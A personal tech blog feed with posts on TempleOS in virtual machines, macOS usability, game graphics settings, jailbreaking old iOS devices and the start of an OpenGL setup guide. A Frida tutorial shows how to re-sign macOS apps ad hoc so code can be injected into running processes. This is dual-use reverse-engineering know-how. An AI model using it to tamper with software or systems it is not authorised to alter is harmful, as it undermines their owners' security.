Posts on Malware Werewolf

TempleOS on Apple Silicon

Sat, 17 Aug 2024 00:00:00 +0000

TempleOS is a unique OS, it was created by one single person with no support from other developers, it has its own compiler, games and all the usual things you can find in an OS with the difference that everything is packed into a few lines of code which for things like games is just brilliant.

The code can be viewed on Github and like I already mention, TemplesOS is using its own compiler called HolyC.

So TempleOS can only work on x86_64 architecture, but luckily it can also work on ARM, the only thing that I couldn’t make it work was the audio, everything else is working fine.

Installation

So the installation is super simple, you just need to download UTM and a template for UTM. Just download the ISO from the official website and add it to the Drives as a CD/DVD (ISO) Image and you should be able to boot inside the VM.

Follow the instructions on screen and if you can’t use the mouse, there is an icon on the window to capture input devices which will enable the mouse. After the installation is done instead of rebooting from the VM when asked to, just shut down the VM, remove the disk image and after rebooting the VM you should see a list of options to choose the drive, select 1 which is the C drive.

QEMU

I managed to get TempleOS working with QEMU alone, but it was having some issues when resizing the screen or using a bigger resolution. I thought that it was a problem due to the fact that TempleOS has been created to work on a 640x480 resolution, but then I tried ZealOS which is a fork of TempleOS but with some extra features one of them include support for bigger resolutions. But this wasn’t working either and it turned out that in order to change the resolution depending on the Bootloader you are using, you can either update it in the boot menu (this by using Limine) or if you want to choose the painful way, you can update the resolution by recompiling the whole kernel.

For anyone interested, for TempleOS I used this commands:

qemu-system-x86_64 -m 512M -device virtio-vga -drive file=data.qcow2 -cdrom TempleOS.ISO -boot order=c,menu=on

And for ZealOS I used:

qemu-system-x86_64 -accel tcg -display cocoa -machine q35,kernel_irqchip=off -cdrom ZealOS.iso -hda ZealOS.qcow2 -m 2G -smp 32 -rtc base=localtime -nic user,model=pcnet -vga std

TLDR

I will keep exploring more this OS since I am relearning C/C++, so this only way at the moment to use these kind of OSs is by creating a VM with UTM, since QEMU alone doesn’t really work or it requires more tinkering and since the OS was built just to work on the x86_64 architecture, it is expected to find some problems like the missing audio.

My experience with macOS after 3 years of usage

Tue, 07 May 2024 00:00:00 +0000

I’ve never been a macOS user before, but after so many years working with Windows, I felt that it was the perfect time to try something different, especially considering the birth of the new Apple Silicon chips and the death of Intel on mac devices which brought new things to the operating system. Some things I really love about macOS but some others I can’t really tolerate.

Coding

Starting off with Coding, macbooks are just one of the best if not the best laptops out there. You will never hear the fan spinning not even a single time unless for some super heavy tasks like rendering, the battery will last forever (expect if you start using it as a workstation), good build quality and speakers, customizable terminal that make you feel like you are on a Linux OS (expect you are not and we will talk about the other aspects later).

And it doesn’t stop there, you can type in terminal xcode-select --install and it will install Clang, GCC and Git and you can also have package managers like Homebrew or Macports which work like a package manager on Linux and let you install every tool you need without opening the browser brew install --cask firefox

So for stuff like Web Development, you are in good hands, but the problems start to rise when you are coding desktop applications. I recently started my journey to learn 3D Programming and I was utterly shocked when I found out that not only OpenGL has been terribly deprecated, but the support for 3D graphics on mac has been shifted to a new API called Metal, which wouldn’t be too bad, if only for the fact that there is almost no documentation available (at least not comparable to OpenGL) and you are basically forced to use Swift which again wouldn’t be too bad if only you didn’t have to use XCode.

XCode has a notorious fame for being a terrible IDE: buggy, no extensions, no good auto completion, awful UI, weird shortcuts. About the UI, it’s probably because I am used to an IDE like Visual Studio or Jetbrains Rider, but working on something so different in every aspect just doesn’t make coding a nice and good experience. An IDE is supposed to give you all the tools to code fast and efficiently, not wasting time understanding how a UI it’s working without providing support for extensions.

For C++ luckily you are not forced to use XCode, in fact you can either opt for CLion or Qt Creator or you can be like me and hurt yourself and configure the debugger and a bunch of other stuff in VSCode which will help you at the same time to learn other stuff like make, GCC, CLang which you would never learn if you press a button to Run or Debug your code.

macOS is missing some parts

I will never understand why in macOS you have to install so many tools to be able to even use correctly an operating system. Some of the tools I have installed:

AltTab the CMD + Tab of macOS is not the same ALT + TAB on Windows, if you have more windows opened for the same process, you can’t switch between them. This tool fixes these problems and add couple of other features.
Rectangle another thing that macOS is really bad at is the window management, I guess this was designed to be used with a trackpad and the gestures but it feels so incovenient and not very productive. This tool again fixes these problems and allows you to have resizable windows like on another operating system. If the new versions of macOS will start having window tiling.
Raycast it seems that there is a pattern where some things are good but others are not that great. macOS is using something called Spotlight which works by pressing CMD + Spacebar and you can do bunch of stuff like using the calculator, open programs, files which wouldn’t be bad if only it wasn’t limited in what it does and slow indexing the queries you enter to search for files or folders. This tool not only improves this aspect, but it also adds plugins and it is highly customizable.
iTerm but wait why did I praise before the macOS terminal and now I am suggesting a third party terminal ? It’s because the default version is missing lot of features like clickable links, a better search, autocomplete and many other features.
Any other web browser that is not Safari, which is terrible for web development and it manages tabs in a weird way compared to Chrome or Firefox, and it doesn’t have the same amount of extensions. Still great if you want to save some battery, since it uses less RAM than Firefox and Chrome.

I have installed other tools but they are not essentially required but some worth to mention are:

I think that if an OS force you to install too many tools to be productive or improve its functionality, it’s not a good thing since the OS should be designed to offer you only the essentional tools to do your job and then install only the stuff you really need. At least macOS does not have the same amount of bloatware compared to Windows.

Dockbar

I don’t really understand why Apple designed the Dockbar this way but it is very different unlike the Windows taskbar. Programs can only be closed if you right click on the icon and select quit, which is super annoying. Navigating through this Dockbar also feels unpractical, it’s 10 times faster pressing CMD + Tab to switch windows. So what I did was simply resizing the Dockbar to be very small, and put it at the edge of my macbook screen so I can stop using it completely. Oh and by the way, if you want to completely close an application it’s also faster pressing CMD + Q.

Gaming

This is kinda of a mix, macs are not designed to be gaming machines, but with the recent models, there is been some huge improvements on this side. We got many games ported to macOS like Resident Evil Village, Resident Evil 4, Death Stranding, No Man’s Sky and yet it is still not much in terms of options you can get but luckily Crossover is rocking hard providing more support for triple A games and for more legacy stuff there is Parallels. So unless you want to play the most recent triple A titles, you are very well covered and as long as you buy a macbook with a fan.

Which bring us to another debate that Apple created, which is the 8GB of RAM being more than enough for most people. This is simply false because unless you send emails or watch videos on Netflix, you can’t simply use a laptop or any device with just 8GB of RAM in 2024. You will run out of RAM very fast considering that nowadays many applications are RAM eaters, like Chrome which is not even a game.

SIP

SIP (System Integrity Protection) should never be disabled, if you have an app which tells you to disable it, get another app or find another workaround. I don’t remember the list of things that can go wrong if you disable it but just to list a few I have found:

you become more vulnerable to malwares
if an app doesn’t have access to some parts of the system, now it has access to:
- /System
- /usr
- /bin
- /sbin
- /var
Apple Pay will not work as long as SIP is disabled
some other apps will also stop working

Emulation is just perfect

I’ve never had a better experience with emulation in my life before, in terms of gaming you have plenty of emulators which can easily run demanding titles without even overeating the hardware and Parallels just works easily out of the box with the least amount of effort to get stuff working. But now it seems that VMWare could be a good alternative, which on macOS is also free.

Linux is there but not completely

The Asahi team did a pretty good job in collaboration with the Fedora Project to improve the OS and deliver US a better experience on Linux ARM as mentioned here, but unfortunately, there are drivers that are still not fully working and it is true that it is already usable but it still has some problems related to speakers, battery draining fast, external monitor not working with macbooks that don’t have an HDMI port which don’t really make me switch from macOS at the moment.

Get at least a pro model

I got a macbook pro 13 before Apple stopped shipping them and I gotta say it is a great laptop, but you don’t have the necessary ports like HDMI, so you guessed it, spend other bucks buying adapters! So I am saying get at least a pro so you don’t have to become mad with this, but one adapter I can recommend is Anker which turned out to be really good.

In Europe the situation is not great, since to get a macbook pro you have to spend now at least 2k euros with no warranty included and with just 8GB of RAM and 512GB of storage which is ridiculous. You want a long term laptop ? Get at least 16GB of RAM and 512GB of SSD, otherwise you’re just wasting your money.

Adapters hell!

This is not just macbooks, it’s also the same for other models like Dell XPS, I have tons of USBs and cables that are using USB-A, why removing all these ports ? Some of these adapters have given tons of problems, like screen flickering and other components failure. One thing for sure, if you have to get an adapter, get a premium one, I had to switch between 3 different adapters to finally get one that it’s working good. I can recommend the Anker one, which costs around 60 euros.

Battery

It is true that the battery will last for many many hours, but as soon as you connect an Adapter and you start using the macbook more as a workstation, the battery will last around 3-4 hours depending on the usage. So in terms of battery, I don’t think it’s really better than other laptops on this side, you probably want discharge the battery once in a while but keep the macbook plugged in so you don’t increase the cycle counts too quickly, especially for heavy tasks.

TLDR

macOS is a great OS but if you are used to Windows, you’ll find many weird things, but once you get used to them, you start liking them. Can’t recommend another laptop unless you can avoid paying the fee to have Windows already installed and put Linux on it. It’s for me to come back to Windows since macOS improved my productivity, I’m still sticking to Windows because of my work laptop and because I do .NET development, but unless you need to create WPF apps, you don’t need Windows to do any new .NET development since everything is multi platform and open source.

Understanding some graphics settings in BG3

Fri, 06 Oct 2023 00:00:00 +0000

I recently came around a video on YouTube which was showing a benchmark with Baldur’s Gate 3 on macOS, the problem with the video is that some settings were not used correctly and for this, game performances were actually worse than they would have been with the right settings.

Many people are using these settings without first understanding what they do and it’s not entirely their fault even though the game already provides a short explanation, it’s not very intuitive and easy to understand.

What is AMD FSR and how does it improve my fps in game ?

Let’s take a screen from Baldur’s Gate 3 settings menu where we can see a quick explanation for what it is used for:

It mentions something about an upscaling to get better framerates at a lower resolution, so in other words, you can still play the game at 1080p, but since it is doing an upscaling, you may not see the image as good as it would have been on a native resolution with the AMD FSR turned off. The point is to improve performance by trading image quality for more FPS, but you sacrifice less image quality than if you scale with a simpler algorithm. So while it is still a trade-off, FSR makes it a smaller trade-off than it would normally be.

This is a really powerful tool because without it, very demanding games would not be playable with some graphics cards, like the integrated one for the Apple M1. A little overview how performances look like with the AMD FSR turned on:

Depending on the models and the environment to render on screen, it can be higher or stabilize around 30 fps but overall for the base Apple M1 chip it’s playable.

But what happens if you turn it off ? Well things get even worse:

By the way how do you activate that small window to measure fps in the game ? On macOS just open the terminal and paste the following command:

/bin/launchctl setenv MTL_HUD_ENABLED 1

Replace 1 with 0 to disable it, if the game is already running, you have to close the game and then reopen it to see the windows appearing or disappearing. On Windows you can use the Steam FPS Counter (if you bought the game on Steam of course) or MSI Afterburner.

Double and Triple buffering for vsync

So we talked about the AMD FSR but I also want to talk a bit about the vsync buffering, unless you have more RAM you’re not really going to notice any differences but in a nutshell, with double buffering the GPU waits for the most recently rendered frame to get displayed before beginning work on the next frame. With triple buffering, the GPU starts working on the next frame after that in the third buffer and if that new frame completes first, that frame gets displayed next and the other frame in-between gets discarded.

Which one is better is a personal preference. Double buffer for the steadiest FPS, triple buffer for the faster response rate. Some people prefer steady movement, others prefer the fastest response speed. Personally I chose to completely disable vsync so I can get a stable 30 fps.

Anti-aliasing

Like I said some settings are explained when you select them in the video settings menu, but they are not very easy to understand, I didn’t really know why my game looked like a set of stairs:

After many attempts, I found out for some reason, when the AMD FSR is turned on and you change the Anti-aliasing and you reboot the game, the latter just goes back to off. It’s very important to have this feature turned on TAA because without it, when the pixels are rendered instead of looking like a curve, they look like a set of stairs instead.

Why do the pixels look like this when rendered ? The main reason is because the computer screen or output device is made up of a large number of pixels. Each pixel is rectangular in shape. When it comes to making lines that curve or are rounded, the rectangles cause jagged edges. The Anti-aliasing aims to solve this problem, by making these rendered rectangular pixels to look more like smooth curves instead. So when set to TAA it looks much better than before:

So is BG3 really playable on Apple M1 or some other low hardware ?

Well yes but you have to disable some settings like dynamic crowds or shadows sacrifing a bit some performance to get stable 30 fps. You could easily reach 40 fps but that would mean make the GPU to worker harder and since the hardware itself is not capable to go over than 40 fps with BG3, you should definetely lock the fps to 30 to avoid using more resources.

Downgrade and jailbreak from iOS 9 to 8.4.1

Wed, 19 Apr 2023 00:00:00 +0000

Downgrading a legacy iOS device can be tricky but luckily for us, there are two different methods we can use. We’ll first explore a method which doesn’t require a computer and it can be done directly on the iOS device. Then we’ll see how to downgrade using a script called Legacy-iOS-Kit, I then forked the repo to do some changes specifically for macOS to use the latest bash version from homebrew.

It’s recommended to do a backup first to avoid losing all the data you have stored. If you are on Windows, you will need iTunes to restore iOS.

Supported devices

32 bit devices are supported for both methods:

iPhone 4S
iPhone 5
iPad 2, iPad 3, iPad 4
iPad mini 1
iPod touch 5

Why the downgrade ?

We’re specifically targeting an older iOS version which received a untethered jailbreak, which is a persistent jailbreak that doesn’t require to jailbreak the device another time after rebooting. Unfortunately the iOS versions 9.3.5 and 9.3.6 only have a semi-tethered jailbreak (so after each reboot you will have to jailbreak again), but we can still use it to downgrade iOS.

How do I go back if anything goes wrong ?

Unfortunately if your device is stucked in a bootloop or it can’t boot into iOS, the only way to fix it is to restore iOS through iTunes. So let’s say you managed to downgrade from iOS 9.3.6 to 8.4.1 but something went wrong when installing the jailbreak, in this case when restoring through iTunes, you will go back to iOS 9.3.6. This is because the last two signed IPSW by Apple are 9.3.5 and 9.3.6 so it’s not possible to restore to 8.4.1 because the latter is not signed. If you ever need the IPSW (a file format used to install iOS firmware) of a specific version, you can use IPSW Downloads.

Depending on your device, entering into recovering mode might be different, for instance on the iPad (the one with the home button) you just need to keep pressing the home and power button at the same time until it tells you to connect the device to iTunes. For any doubt you can check the Apple documentation to restore and enter into recovery mode.

As an alternative to iTunes, if you managed to jailbreak your device and you have Cydia installed, you can use a tweak called Cydia Eraser which resets iOS to its original state before the jailbreak without updating iOS. This assumes you are able to boot into your system of course.

To sideload or not to sideload

Sideloading allows you to install applications on your device without using the appstore, it’s relatively an easy process, you just need Sideloadly and preferably a separate Apple account with a free developer subscription just to sideload.

So we need to sideload an application to jailbreak our device but there’s also another way which doesn’t require Sideloadly. A website named jailbreaks.app has some links which allow you to directly install the application you’re insterested in, directly on your iOS device when they are opened through a browser.

This is something that will come in handy later when we’ll need to fully jailbreak the device with Daibutsu, the IPA you download through the official website needs to be signed first, so if the process is not done correctly, you will be stucked in a bootloop. Instead if you install Daibutsu through jailbreaks.app, the IPA is already signed so you won’t get any issue when jailbreaking.

The semi-tethered and untethered jailbreaks can both be installed through jailbreaks.app, so Sideloadly is not needed since the applications will be installed directly on the device.

Is Daibutsu the only untethered jailbreak available ?

Technically there are other jailbreaks that can be used:

Etasonjb is quite unstable, there’s a tweak that needs to be installed to fix some bugs. For instance when rebooting your device, you will need to jailbreak again unless you install the tweak I was mentioning. I also ran into an issue where iOS wasn’t loading the tweaks in the settings app, Cydia and the other tweaks I already installed were usable for the most part, but you couldn’t change any of their settings. I was able to fix it but then after rebooting, the tweaks were not showing again so I had to restore the iPad and try Daibutsu. The tweak can be installed by adding this repo to Cydia and looking for Etason untether:
```
http://repo.tihmstar.net/
```
Although Home Depot is a semi-tethered jailbreak, you can still apply a untethered jailbreak by using the Etason untether tweak in the tihmstar repo. You might stumble on Lukezgd’s repo which contains a tweak named UntetherHomeDepot, avoid installing it! First it is not made for iOS 8.4.1 and second as mentioned on the Home Depot wiki, it can bootloop your device so if you’re afraid of bootloops do not install it!

On the other hand Daibutsu doesn’t require any extra tweaks to make it work, unless you decide to pick the hard way and sign the IPA manually which as I already mentioned if not done correctly can bootloop your device.

Downgrade first method - update SystemVersion.plist no computer required

For both methods you will have to first jailbreak your device, then downgrade to iOS 8.4.1. It is highly recommended to both disable the passcode and log out of iCloud or else when you try to jailbreak and after the device reboots, the latter will not be jailbroken and you’ll have to reapply the jailbreak again until it works.

So let’s breakdown the steps we need to do:

Connect your device through a reliable power source, you don’t want your device to be 10% of the current battery when jailbreaking.
On your device, open Safari and go on jailbreaks.app to pick one semi-tethered jailbreak compatible with iOS 9 like p0laris, Phoenix or HomeDepot.
When opening the application, iOS will ask you to trust the developer, after that you can open it and jailbreak your device and wait for it to reboot. If everything worked correctly, you should see Cydia installed.
Open Cydia and install iFile or Filza File Manager, ignore the updates Cydia is requesting.
Open iFile or Filza File Manager, go to /System/Library/CoreServices and open the SystemVersion.plist file.
We need to update the ProductVersion and ProductBuildVersion, depending on your device, these two values will be different. So to find out the correct values you can use IPSW.me, for example I’m using the iPad mini first gen. so I need to look inside the OTAs tab to find a ProductVersion and ProductBuildVersion which can allow me to downgrade to an older version. In my case I picked 6.1.3 for the ProductVersion and 10B329 ProductBuildVersion.
Save the SystemVersion.plist file and reboot your device.
After the device rebooted, open Settings, General then Software Update. You should get an update for iOS 8.4.1 to install if not you did something wrong, in that case you have to restore and start over.
After the installation is complete, if you go to Settings, General, About you should see the old version 8.4.1
Go to Settings, General, Reset, then click Erase All Content and Settings.

As you can see this process is very long and tedious but it doesn’t require a computer, just your device. But luckily for us there’s another way which involves a script but the other hand it requires a computer.

Downgrade second method - use the script Legacy-iOS-Kit

As mentioned on the official repo on Github, it is not recommended to launch the script through Windows, so you have to choose between macOS or Linux.

On Windows you have to create a bootable usb just for Linux. You could also use a VM to launch the script but there some extra steps involved to connect the usb and it may not work.

On macOS you can use the fork I made to use the latest version of bash with homebrew. The reason I forked the repo it’s because if you launch the script, you’ll get an error saying to update bash with a more recent version:

[Error] Your bash version (3) is too old. Install a newer version of bash to continue.
* For macOS users, install bash, libimobiledevice, and libirecovery from Homebrew or MacPorts
* For Homebrew: brew install bash libimobiledevice libirecovery
* For MacPorts: sudo port install bash libimobiledevice libirecovery

You have potentionally two options:

The original script code is using the version inside /usr/bin/env so technically it should use the first occurence it founds of an interpreter in the environment. When I typed the command:
```
$ /usr/bin/env bash
```
it was still using the old version of bash so not the one from homebrew. So I added
```
export PATH="/opt/homebrew/bin:$PATH"
```
to my ~/.zshrc and it worked, although it seemed a bit forced since the path was already in the environment but in a different position after the bash version installed in /bin/bash.
On the other hand if you don’t like messing around the environment that much, you can use my fork of the script which is going to use directly the bash version from homebrew.

Whatever option you choose, before using the script you need to install a couple of packages as mentioned in the error message above:

$ brew install bash libimobiledevice libirecovery

Let’s breakdown the steps to run the script:

Make sure your device has enough battery left, we’ll connect it later to the computer.
On your device, open Safari and go on jailbreaks.app to pick one semi-tethered jailbreak compatible with iOS 9 like p0laris, Phoenix or HomeDepot.
When opening the application, iOS will ask you to trust the developer, after that you can open it and jailbreak your device and wait for it to reboot. If everything worked correctly, you should see Cydia installed.
Open Cydia and install OpenSSH
Add this repo to Cydia

https://lukezgd.github.io/repo/

Install kDFUApp which will be used to enter into a different recovery mode, not available just by pressing the power and home button.
Optional: depending on your device, it may be necessary to install kDFUApp Bundles which offers a wider device support.
Open kDFUApp and select all the options available, when they’re all selected you’ll be able to click on enter kDFU at the bottom of your screen.
Plug in your device.
Launch the script through the terminal by typing:

$ ./restore.sh

Select Restore Firmware by typing 1
Select iOS 8.4.1 by typing 1
If you already have an IPSW file in the same directory where you launched the script, it will be used to downgrade iOS in that case type 3 to start restore otherwise type 2 to download the IPSW.
The script will ask you to jailbreak directly your device while downgrading, select n it is recommended to do it manually.
When asked Is your device already in pwned iBSS/kDFU mode? (y/N) select y, your device will now apply the downgrade and reboot.

Some more steps unlike the first method but everything is done automatically and you don’t need to erase everything to fix some instabilities caused when forcing iOS to downgrade.

Jailbreak with Daibutsu

We’re almost there, just a few more steps:

On your device open Safari and go on jailbreaks.app and select Daibutsu.
When opening the application, iOS will ask you to trust the developer, after that you can open it and jailbreak your device and wait for it to reboot. If everything worked correctly, you should see Cydia installed. There might be a scenario where the device is still not jailbroken, if that’s the case repeat the jailbreak.
Add this repo to Cydia which can also be found on dora2ios to install feature updates of Daibutsu:

https://kok3shidoll.github.io/repo/

Install a modern certificate to add more repositories to Cydia which are using a new certificate.

Congrats, you’ve successfully downgraded and jailbreaked an iDevice from iOS 9 to 8.4.1!

Where to go from there ?

There are many tweaks and repositories available but before installing anything unless it comes from a reliable source, do some research. Cydia will already mark any weird repo you’re trying to add which has been flagged several times by other users. Since you’re using a jailbroken device, you’re also more vulnerable to malwares but if you’re careful it’s not a big deal. I recommend taking a look at the Legacy Jailbreak subreddit, they also have a discord channel with a couple of repositories you can add to Cydia. The wiki has also some awesome content I haven’t covered in this article!

Inject code in macOS processes with Frida

Mon, 27 Mar 2023 00:00:00 +0000

On the arm64 architecture and macOS, there are not many ways to inject some code into an application, luckily there’s a tool called Frida which not only serves that purpose but it also allows you to reverse-engineering apps. Frida’s documentation give you some examples to start using the tool, however I had a few issues when running the tool on macOS which we’re going to see shortly.

Requirements

Installing Frida with python is very straight forward, latest 3.x is recommended. Simply run this command in the terminal to install everything we need:

$ pip install frida frida-tools

Some cool websites and videos to mention while learning Frida

A word about SIP (system integrity protection)

Frida docs recommends to disable the SIP in macOS, although is not really recommended as quoted on the Apple developer documentation:

Disable SIP only temporarily to perform necessary tasks, and reenable it as soon as possible. Failure to reenable SIP when you are done testing leaves your computer vulnerable to malicious code.

But that isn’t the only issue, in fact if you disable the SIP, many other apps will stop working until you renable it. There’s a workaround we can use to bypass the SIP, keep in mind this bypass (if you want to call it that way) is not going to work on every application. In that case, disabling the SIP is the only option you have at your disposal.

Overwrite the signature of an application

Unlike Linux or Windows, each app on macOS has its own signature and without it, the app cannot run and because of the signature, you can’t really attach Frida to all processes, since you will get an error like:

So what happens if we attempt to override the signature using a command from the terminal called codesign ? Make a copy of the application before launching it, we need the application executable the one inside the MacOS folder, we can get to this folder by right clicking on the application and clicking on Show Package Contents:

$ sudo codesign -f -s - /apps/Firefox2.app/Contents/MacOS/firefox

and now if we type again:

$ frida firefox

we can attach Frida to Firefox:

But wait why is it working now ? If we compare the signature of the two apps, the real one and the copy using the command:

$ codesign -dv /apps/Firefox.app

we can see there are some small differences, for Firefox (the unmodified signature) we have:

Executable=/apps/Firefox.app/Contents/MacOS/firefox
Identifier=org.mozilla.firefox
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20500 size=863 flags=0x10000(runtime) hashes=18+5 location=embedded
Signature size=8988
Timestamp=21 Mar 2023 at 13:58:54
Info.plist entries=25
TeamIdentifier=43AQ936H96
Runtime Version=13.0.0
Sealed Resources version=2 rules=13 files=80
Internal requirements count=1 size=148

and for the copy we have:

Executable=/apps/Firefox2.app/Contents/MacOS/firefox
Identifier=org.mozilla.firefox
Format=app bundle with Mach-O universal (x86_64 arm64)
CodeDirectory v=20400 size=780 flags=0x2(adhoc) hashes=18+3 location=embedded
Signature=adhoc
Info.plist entries=25
TeamIdentifier=not set
Sealed Resources version=2 rules=13 files=80
Internal requirements count=0 size=12

We’re interested in the property Signature=adhoc, on the documentation it says:

The code has been sealed without a signing identity. No identity may be retrieved from it, and any code requirement placing restrictions on the signing identity will fail. This flag is set by Code Signing Services when you create an ad-hoc signature, and cannot be set explicitly. An ad-hoc signature is created by signing with the pseudo-identity “-” (a dash).

It basically means that the binary is the same as non-signed, so it won’t pass through any kind of verification. As I already mentioned this won’t be possible on every application, if that’s the case disabling the SIP might fix the issue.

Protected parts of the system

Some apps like Safari don’t even need a new signature and you can easily attach Frida to them. It also depends where the app you want to debug is located, as stated on the Apple documentation, System Integrity Protection includes protection for these parts of the system:

/System
/usr
/bin
/sbin
/var
Apps that are pre-installed with the Mac operating system

Paths and apps that third-party apps and installers can continue to write to include:

/Applications
/Library
/usr/local

And the documentation also says:

System Integrity Protection is designed to allow modification of these protected parts only by processes that are signed by Apple and have special entitlements to write to system files, such as Apple software updates and Apple installers. Apps that you download from the App Store already work with System Integrity Protection. Other third-party software, if it conflicts with System Integrity Protection, might be set aside when you upgrade to OS X El Capitan or later.

So what this means is that all the authorized apps by Apple can write, some parts of the system, all the other apps can simply write to folders such as Applications but why are we interested in these protected folders ? Some of the pre-installed apps like Calculator or Maps, are accessible through the Applications folder but they are actually located in System:

for Calculator the path is /System/Applications/Calculator.app
for Maps the path is /System/Applications/Maps.app

And with the SIP enabled, you can’t attach Frida to these system apps, Safari is an exception even if it’s a pre-installed app since it’s in a different path. To attach Frida to Safari, you need to use the correct PID, in fact if you type:

$ frida Safari

you will get an error where there are two processes with the same name:

Failed to spawn: ambiguous name; it matches: safari (pid: 2296), Safari (pid: 2270)

pick one of the two PIDs, it’s usually the first one and type:

$ frida 2296

and Frida will attach correctly to the process.

Frida CLI

All the Frida commands you can use are listed in the documentation, the one you’re probably going to use the most is frida-ps, which is useful for listing processes on the current or even a remote system. But if you just type frida-ps in the terminal you will get a lot of results, so to filter only what you’re looking for you can use grep:

$ frida-ps | grep Safari

Another command worth to mention is frida-trace which is a tool for dynamically tracing function calls. Depending on the OS you’re targeting, functions can be called differently, in Objective-C case to use its functions, you would use a command like the following (I’m using OpenGothic as an example):

$ frida-trace -f "/Applications/OpenGothic.app/Contents/MacOS/Gothic2Notr" -m "-[NSApplication **]"

In this case, NSApplication is an Objective-C function.

Objective-C functions

It’s not mandatory to be a Objective-C guru, but it certaintly help to understand a bit the language to use the functions in Frida. A good place to start learning about the Objective-C functions is to check the documentation. In order to inject some code, Frida is using Javascript, after attaching Frida to a process to invoke a function you would write something like:

ObjC.classes.NSString.stringWithString_("Hello World");

The underscore after the method name is used to replace : so for instance in Objective-C, you would write:

stringWithString:

on the other hand in Frida, you replace the character with _:

stringWithString_

All the syntax is very well explained on the Frida documentation for Objective-C using Javascript.

Injecting code into an application

The code used to be injected in the processes is using Javascript and Python is used to set all the stuff you need, like the process to inject the code and the actual script to use. We’ll take a look to Javascript first, then we’ll create a little project using also Python to inject automatically the script.

It’s worth to mention that some of the Javascript examples shown in the documentation are not working with the SIP enabled, but let’s take a look to this code:

const { NSSound } = ObjC.classes; /* macOS */
ObjC.schedule(ObjC.mainQueue, () => {
const sound = NSSound.alloc().initWithContentsOfFile_byReference_("/Users/oleavr/.Trash/test.mp3", true);
sound.play();
});

Why is this an interesting example ? If we look at the path used which is /Users/oleavr/.Trash/test.mp3 and we get to the directory Users with the terminal which is using a theme like powerlevel10k we can see there’s a lock icon:

We already know which folders are protected thanks to the Apple documentation, but what if we want to check a specific folder to be sure ? We can use ls for that and look for restricted:

$ ls -lO /Users

which prints:

drwxrwxrwt 26 root wheel - 832 Feb 9 10:39 Shared
drwxr-xr-x+ 93 yourusername staff - 2976 Mar 30 20:18 yourusername

So the directory is not protected, but to write anything inside this folder, you need to run a command as sudo. On the other hand, if we inspect System, we get that everything is restricted, and thus protected by the SIP:

drwxr-xr-x 43 root wheel restricted 1376 Feb 9 10:39 Applications
drwxr-xr-x 4 root wheel restricted 128 Feb 9 10:39 Cryptexes
drwxr-xr-x@ 2 root wheel restricted 64 Feb 9 10:39 Developer
drwxr-xr-x 5 root wheel restricted 160 Feb 9 10:39 DriverKit
drwxr-xr-x 146 root wheel restricted 4672 Feb 9 10:39 Library
drwxr-xr-x 14 root wheel restricted 448 Feb 9 10:39 Volumes
drwxr-xr-x 5 root wheel restricted 160 Feb 9 10:39 iOSSupport

So even using Frida as sudo doesn’t allow you to access the Users folder. One solution to this issue is to move the .mp3 in another folder such as tmp which doesn’t have any restrictions nor it does require sudo to access its content. To copy the file to tmp use this command as an example:

$ cp /Users/changeusername/.Trash/trash.mp3 /tmp/trash.mp3

Let’s use Safari as an example (remember to use the correct PID when invoking Frida instead of the process name), this line of code will simply use a Objective-C function to play an .mp3 file:

ObjC.classes.NSSound.alloc().initWithContentsOfFile_byReference_("/tmp/trash.mp3", true).play();

If everything worked as expected, you should hear the audio playing which is using the process attached by Frida.

But how do I inject the whole script ? Create a javascript file like:

const { NSSound } = ObjC.classes; /* macOS */
ObjC.schedule(ObjC.mainQueue, () => {
const sound = NSSound.alloc().initWithContentsOfFile_byReference_("/tmp/trash.mp3", true);
sound.play();
});

then use this command to inject the script into the process of your choice (you can also use the PID instead of the process name):

frida -l myscript.js firefox

Use Python to remove repetitive tasks

Many things we’ve done till now can be repeated a lot of times, but what if we just create a script to do everything for us ? That’s where Python comes in handy!

Let’s create a folder with two files, one containing our Python script, we can name it as main.py:

import os
import sys
import frida
_SCRIPT_FILENAME = 'myscript.js'
def on_message(message, date):
"""Print received messages."""
print(message)
def main(process_name):
with open(_SCRIPT_FILENAME, 'r') as script_file:
code = script_file.read()
session = frida.attach(process_name)
script = session.create_script(code)
script.on('message', on_message)
script.load()
print("[!] Ctrl+D or Ctrl+Z to detach from instrumented program.\n\n")
sys.stdin.read()
session.detach()
if __name__ == '__main__':
main(sys.argv[1])

and the other containing the Javascript code to inject, we can name it myscript.js:

const { NSSound } = ObjC.classes;
ObjC.schedule(ObjC.mainQueue, () => {
const sound = NSSound.alloc().initWithContentsOfFile_byReference_("/tmp/trash.mp3", true);
sound.play();
});

Let’s take a quick look to the Python code:

def on_message(message, data):
"""Print received messages."""
print(message)

it is based on the example shown on Frida Basics although some functions were not working on macOS, so I changed it a bit to make it work. It is pretty straight forward, but just to give you a quick overview, we have the on_message callback which will receive the messages from the script, we will just print them and avoid handling them. We then create a session and attach Frida to the process we want to debug using:

session = frida.attach(process_name)

After we created the session as mentioned on Frida Basics, we can:

assign how each callback will be handled (for now, just the message one) with .on(event, callback) - When we are finished assigning callbacks we can load the instrumentation script. When we have finished with everything, we can call device.resume(pid) to resume the process and instrumentation will begin. When we are doing, we can call session.detach to detach from the instrumented process and revert any instrumentation (hooks will be reverted).

In the terminal, simply type python3 main.py Firefox to run the script. You should be able to hear the .mp3 playing in the background, remember to move it in /tmp if you’ve not already done so. To stop the audio playing, you need to quit the process 😀

TLDR

There are not many available resources to use Frida on macOS but the process is pretty similar to iOS, although the SIP doesn’t really help to do a lot of things and disabling it doesn’t seem to be the best solution. So avoid disabling the SIP unless there’s no workaround for the application you’re debugging.

Create a window with OpenGL on macOS

Sat, 11 Mar 2023 00:00:00 +0000

In the most recent versions of macOS, OpenGL has been replaced by Metal but it can still be used and some old engines still rely on OpenGL. But how to use OpenGL on Apple Silicon ? There are many libraries out there, the one we’re going to use is called GLFW with native support for the ARM architecture.

LearnOpenGL already lists all the necessary steps to create a window, but the process on macOS is a bit different and not much is explained in greater details especially for XCode. If you don’t want to compile the library source code and use directly the pre-compiled binaries for macOS, but I highly encourage you to compile the library by yourself, as already stated on LearnOpenGL you might want to do this because:

Compiling the library from the source code guarantees that the resulting library is perfectly tailored for your CPU/OS, a luxury pre-compiled binaries don’t always provide (sometimes, pre-compiled binaries are not available for your system).

We’re also going to see another method which involves compiling the code through Clang and install GLFW with HomeBrew.

Generate a XCode project to compile GLFW using CMake

First step is to download the source package for GLFW, next download and install CMake, which simply is a tool to generate all the files you need for a project by choosing the IDE you want to use, in our current scenario we want to create a project for XCode.

